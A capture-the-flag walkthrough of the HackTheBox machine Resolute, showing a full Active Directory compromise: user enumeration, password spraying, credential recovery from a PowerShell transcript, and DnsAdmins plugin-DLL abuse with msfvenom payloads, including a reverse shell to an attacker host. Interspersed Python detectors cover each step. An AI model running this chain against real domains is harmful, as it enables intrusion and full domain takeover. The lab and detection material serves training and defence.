
HackTheBox Resolute

Author: Edwin | Shiro

Machine Synopsis

Resolute is an easy difficulty Windows machine that features Active Directory. The Active Directory anonymous bind is used to obtain a password that the sysadmins set for new user accounts, although it seems that the password for that account has since changed. A password spray reveals that this password is still in use for another domain user account, which gives us access to the system over WinRM. A PowerShell transcript log is discovered, which has captured credentials passed on the command-line. This is used to move laterally to a user that is a member of the DnsAdmins group. This group has the ability to specify that the DNS Server service loads a plugin DLL. After restarting the DNS service, we achieve command execution on the domain controller in the context of NT_AUTHORITY\SYSTEM. (Source)

Key exploitation techniques:

  • Active Directory anonymous LDAP bind for information disclosure
  • Password spray for valid credentials
  • WinRM for initial user access
  • PowerShell transcript log analysis for credential discovery
  • Lateral movement
  • DnsAdmins group abuse for arbitrary DLL loading and RCE

Enumeration

❯ nmap -p- --min-rate 10000 10.10.10.169

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49680/tcp open  unknown
49681/tcp open  unknown
49688/tcp open  unknown
49713/tcp open  unknown
63433/tcp open  unknown

❯ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49680,49681,49688,49713,63433 -sC -sV 10.10.10.169

PORT      STATE  SERVICE      VERSION
53/tcp    open   domain       Simple DNS Plus
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-06 01:49:47Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   msrpc        Microsoft Windows RPC
49666/tcp open   msrpc        Microsoft Windows RPC
49667/tcp open   msrpc        Microsoft Windows RPC
49671/tcp open   msrpc        Microsoft Windows RPC
49680/tcp open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
49681/tcp open   msrpc        Microsoft Windows RPC
49688/tcp open   msrpc        Microsoft Windows RPC
49713/tcp open   msrpc        Microsoft Windows RPC
63433/tcp closed unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

The scan identified a Windows Domain Controller (RESOLUTE) running Active Directory services. megabank.local was added to /etc/hosts.

❯ echo -e '10.10.10.169\tmegabank.local' | sudo tee -a /etc/hosts

rpcclient was used with a null session to enumerate domain users, revealing a list of potential usernames.

❯ rpcclient -U "" -N 10.10.10.169
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
...
user:[marko] rid:[0x457]
...

rpcclient $> queryuser marko
    User Name   :   marko
    Full Name   :   Marko Novak
    ...
    Description :   Account created. Password set to Welcome123!
    ...

The queryuser marko command revealed a plaintext password in the account description: Welcome123!. Although marko’s account was no longer using this password, it was a strong candidate for password spraying, since a password set on account creation is often reused or left unchanged on other accounts.

All enumerated users were saved to users.txt. kerbrute was used to validate these users.

❯ kerbrute -domain megabank.local -users users.txt -dc-ip 10.10.10.169
...
[*] Valid user => Administrator
...
[*] Valid user => ryan
...
[*] Valid user => melanie
...

impacket-GetNPUsers was used to check for accounts with UF_DONT_REQUIRE_PREAUTH set (AS-REP roastable accounts), but none were found.

Exploitation

Password Spray & Initial Access (melanie)

A password spray was performed using nxc with the discovered password Welcome123! against the list of valid users.

❯ nxc smb megabank.local -u users.txt -p 'Welcome123!' --continue-on-success
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
...
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123!

The password Welcome123! was valid for melanie. evil-winrm was used to gain a shell as melanie.

❯ evil-winrm -i 10.10.10.169 -P 5985 -u melanie -p 'Welcome123!'
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
1c3161947f44efe99fc0caf2175edcf5

The user.txt flag was retrieved.
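As an added defensive example (not part of the original writeup), the following Python detects the pattern the nxc spray above produces on the domain controller side: one source failing against many distinct accounts in a short window, followed by a success. The authentication records are constructed here in a simplified key=value form rather than taken from a real 4625/4624 export; the window and threshold are assumptions to tune.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication records (simplified, not a real event log export) modelled on the
# nxc spray in this writeup: one source tries a single password against every enumerated user.
# The second source is a single user mistyping once and then logging in; it must not alert.
SAMPLE_AUTH = """
2025-02-06T01:52:01Z src=10.10.16.4 user=administrator result=fail
2025-02-06T01:52:01Z src=10.10.16.4 user=ryan result=fail
2025-02-06T01:52:02Z src=10.10.16.4 user=marko result=fail
2025-02-06T01:52:02Z src=10.10.16.4 user=svc_backup result=fail
2025-02-06T01:52:03Z src=10.10.16.4 user=helpdesk01 result=fail
2025-02-06T01:52:03Z src=10.10.16.4 user=melanie result=success
2025-02-06T01:30:00Z src=10.10.10.50 user=melanie result=fail
2025-02-06T01:30:09Z src=10.10.10.50 user=melanie result=success
"""


def detect_spray(log, window=timedelta(minutes=10), min_users=5):
    """Report sources that fail against >= min_users distinct accounts inside one window.

    A spray is 'many accounts, few attempts each', which is what distinguishes it from a
    brute force of one account. Any success from the spraying source inside the same
    window is reported as a likely compromised account.
    """
    by_src = defaultdict(list)
    for line in log.strip().splitlines():
        ts, *fields = line.split()
        ev = dict(f.split("=", 1) for f in fields)
        ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        by_src[ev["src"]].append(ev)

    alerts = []
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        for i, first in enumerate(events):
            span = [e for e in events[i:] if e["ts"] - first["ts"] <= window]
            failed = {e["user"] for e in span if e["result"] == "fail"}
            if len(failed) >= min_users:
                alerts.append({"src": src, "start": first["ts"], "accounts_tried": len(failed),
                               "compromised": sorted(e["user"] for e in span if e["result"] == "success")})
                break   # one alert per source; the window is anchored at the first failure
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_AUTH):
        print(alert)
```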

Privilege Escalation

PowerShell Transcript Log & Lateral Movement (ryan)

Enumeration of users in C:\Users\ revealed ryan.

*Evil-WinRM* PS C:\Users\melanie\Desktop> cd C:\Users
*Evil-WinRM* PS C:\Users> ls
...
d-----        9/27/2019   7:05 AM                ryan
...

A hidden directory PSTranscripts was found in C:\ using dir -force. This directory contained PowerShell transcript logs.

*Evil-WinRM* PS C:\Users> cd C:\
*Evil-WinRM* PS C:\> dir -force
...
d--h--        12/3/2019   6:32 AM                PSTranscripts
...
*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

The PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt file was downloaded and reviewed. It contained a command with plaintext credentials.

❯ cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
...
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!"
...

The password for ryan was Serv3r4Admin4cc123!. Lateral movement to ryan was achieved via evil-winrm.
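As an added audit example (not part of the original writeup), the following Python scans the two places this box leaked credentials: AD user description attributes, which were readable over an anonymous bind, and PowerShell transcript logs, which captured a net use command line with the password in it. The sample records are constructed here to mirror the page, and the regexes are heuristics for these two patterns rather than a complete credential-leak scanner.

```python
import re

# Constructed sample data modelled on what this box exposed; not real directory or log exports.
SAMPLE_USERS = [
    {"sAMAccountName": "marko", "description": "Account created. Password set to Welcome123!"},
    {"sAMAccountName": "melanie", "description": "Helpdesk, ext. 4412"},
    {"sAMAccountName": "svc_backup", "description": "pwd: B4ckup!2019 (do not change)"},
]
SAMPLE_TRANSCRIPT = r"""
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!"
PS>net use Y: \\fs01\public /persistent:no
PS>net use Z: \\fs02\finance Summer2019 /user:MEGABANK\jane
"""

# "Password set to X", "pwd: X", "pass=X": a password keyword, a separator, then the secret token.
DESC_SECRET_RE = re.compile(r"\b(?:password|passwd|pwd|pass)\b\s*(?:set\s+to|is|:|=)\s*(\S+)", re.IGNORECASE)
# net use <drive> <\\server\share> [tokens...]: any non-switch token after the share is a credential.
NET_USE_RE = re.compile(r"net\s+use\s+\S+\s+(\\\\\S+)((?:[ \t]+[^\s\"]+)*)", re.IGNORECASE)


def scan_descriptions(users):
    """Flag user objects whose description attribute embeds a password."""
    findings = []
    for u in users:
        m = DESC_SECRET_RE.search(u.get("description", ""))
        if m:
            findings.append({"source": "description", "user": u["sAMAccountName"], "secret": m.group(1)})
    return findings


def scan_transcript(text):
    """Flag 'net use' command lines in a PowerShell transcript that carry a password."""
    findings = []
    for m in NET_USE_RE.finditer(text):
        share, tokens = m.group(1), m.group(2).split()
        user = next((t.split(":", 1)[1] for t in tokens if t.lower().startswith("/user:")), None)
        secrets = [t for t in tokens if not t.startswith("/")]   # /user: and /persistent: are switches, not secrets
        if not secrets:
            continue
        if user is None and len(secrets) > 1:   # bare "<user> <password>" form, as in this box's transcript
            user = secrets[0]
        findings.append({"source": "transcript", "share": share, "user": user, "secret": secrets[-1]})
    return findings


if __name__ == "__main__":
    for f in scan_descriptions(SAMPLE_USERS) + scan_transcript(SAMPLE_TRANSCRIPT):
        print(f)
```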

❯ evil-winrm -i 10.10.10.169 -P 5985 -u ryan -p 'Serv3r4Admin4cc123!'

On ryan’s desktop, note.txt indicated a 1-minute auto-revert for system changes (excluding administrator account changes).

*Evil-WinRM* PS C:\Users\ryan\desktop> type note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute

whoami /groups revealed ryan was a member of the DnsAdmins group.

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups

GROUP INFORMATION
-----------------
...
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
...

DnsAdmins Group Abuse (SYSTEM)

Membership in the DnsAdmins group allows a member to configure the DNS Server service (via the serverlevelplugindll setting) to load an arbitrary DLL. The service runs as NT AUTHORITY\SYSTEM, so the DLL's code executes as SYSTEM on the domain controller. This is a well-known privilege escalation vector.

A malicious DLL payload was generated using msfvenom to reset the Administrator password.

❯ msfvenom -p windows/x64/exec cmd='net user administrator P@ssw0rd /domain' -f dll > hehe.dll

(Alternatively, for a reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.xx.xx LPORT=443 -f dll -o rev.dll)

An SMB server was set up on the attacking machine to host the malicious DLL.

❯ impacket-smbserver share ./

From the ryan shell, the DNS settings were modified using dnscmd to load the malicious DLL upon service restart.

*Evil-WinRM* PS C:\Users\ryan\desktop> dnscmd 127.0.0.1 /config /serverlevelplugindll \\10.10.16.4\share\hehe.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

The DNS service was then manually stopped and started to trigger DLL loading.

*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
...
*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
...
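As an added detection example (not part of the original writeup), the following Python correlates the two signals the escalation above produces on the host: the ServerLevelPluginDll registry value being written (here to a UNC path on the attacker's SMB share) and the DNS service being stopped and started shortly afterwards. The telemetry is constructed in a simplified key=value form; in a real deployment it would be fed from Sysmon registry-set events and service-control events.

```python
from datetime import datetime, timedelta

PLUGIN_KEY = r"HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll"

# Constructed sample telemetry in a simplified key=value form (values contain no spaces),
# mirroring the dnscmd + sc.exe sequence on this box; not a real Sysmon or event log export.
SAMPLE_LOG = r"""
2019-12-03T06:44:01Z host=RESOLUTE event=registry_set user=SYSTEM image=C:\Windows\System32\dns.exe target=HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\BootMethod value=3
2019-12-03T06:45:10Z host=RESOLUTE event=registry_set user=MEGABANK\ryan image=C:\Windows\System32\dnscmd.exe target=HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll value=\\10.10.16.4\share\hehe.dll
2019-12-03T06:45:31Z host=RESOLUTE event=service_control user=MEGABANK\ryan service=dns action=stop
2019-12-03T06:45:40Z host=RESOLUTE event=service_control user=MEGABANK\ryan service=dns action=start
"""


def parse(log):
    """Turn one key=value line per event into dicts with a parsed timestamp."""
    events = []
    for line in log.strip().splitlines():
        ts, *fields = line.split()
        ev = dict(f.split("=", 1) for f in fields)
        ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def detect_plugin_dll_abuse(log, window=timedelta(minutes=5)):
    """Alert whenever ServerLevelPluginDll is written; escalate if DNS is restarted within the window."""
    events = parse(log)
    alerts = []
    for ev in events:
        if ev.get("event") != "registry_set" or ev.get("target", "").lower() != PLUGIN_KEY.lower():
            continue   # other DNS\Parameters writes (e.g. BootMethod above) are routine
        dll = ev.get("value", "")
        # A UNC path means the DLL is fetched from another host at service start: treat as critical.
        severity = "critical" if dll.startswith("\\\\") else "high"
        restarts = [e for e in events if e.get("event") == "service_control" and e.get("service") == "dns"
                    and timedelta(0) <= e["ts"] - ev["ts"] <= window]
        if {e["action"] for e in restarts} >= {"stop", "start"}:
            severity = "critical"   # the DLL is loaded as SYSTEM once the service comes back up
        alerts.append({"ts": ev["ts"], "user": ev.get("user"), "image": ev.get("image"), "dll": dll,
                       "severity": severity, "restart_by": sorted({e["user"] for e in restarts})})
    return alerts


if __name__ == "__main__":
    for alert in detect_plugin_dll_abuse(SAMPLE_LOG):
        print(alert)
```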

The Administrator password was successfully reset to P@ssw0rd. Final login as Administrator via evil-winrm confirmed full system compromise.

❯ evil-winrm -i 10.10.10.169 -P 5985 -u administrator -p 'P@ssw0rd'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
60d344a054c92723949cf2b4c775449c